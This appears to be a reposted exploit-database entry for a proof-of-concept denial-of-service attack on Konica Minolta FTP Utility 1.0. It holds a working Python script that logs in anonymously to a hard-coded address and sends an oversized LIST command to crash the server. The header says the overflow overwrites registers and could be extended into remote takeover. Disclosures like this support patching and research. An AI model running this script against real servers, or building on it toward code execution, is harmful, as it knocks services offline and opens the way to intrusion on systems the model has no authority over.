Código:
  ====================================================================================================
  =============== [ Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) ] ===============
  ====================================================================================================

  # Exploit Title: Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) 
  # Date: [05-16-2020]
  #
  # Found by: Alvaro J. Gene (Socket_0x03)
  # Email: Socket_0x03 (at) teraexe (dot) com
  # Website: www (dot) teraexe (dot) com
  # 
  # Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/
  # Vulnerable Application: Konica Minolta FTP Utility
  # Version: 1.0
  # Server: FTP Server
  # Vulnerable Command: LIST
  # Tested on: Windows 7 SP1
  # 
  # Impact: There is a buffer overflow vulnerability in the LIST command of the FTP server
  # "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers, 
  # such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite 
  # some registers, an individual can use the vulnerable command to build a remote buffer 
  # overflow exploit that will root a system without any user interaction. 
  # 
  # References:
  # https://packetstormsecurity.com/files/157734/konicaminoltaftputility10-dos.txt
  # https://www.exploit-db.com/exploits/48501
  # https://exploit.kitploit.com/2020/05/konica-minolta-ftp-utility-10-denial-of.html
  # https://cxsecurity.com/issue/WLB-2020050152
  # https://www.cnvd.org.cn/flaw/show/CNVD-2020-29212
  

  from ftplib import FTP

  ftp = FTP('192.168.0.16')

  buffer = "A" * 1500

  ftp.login()

  ftp.retrlines('LIST ' + buffer)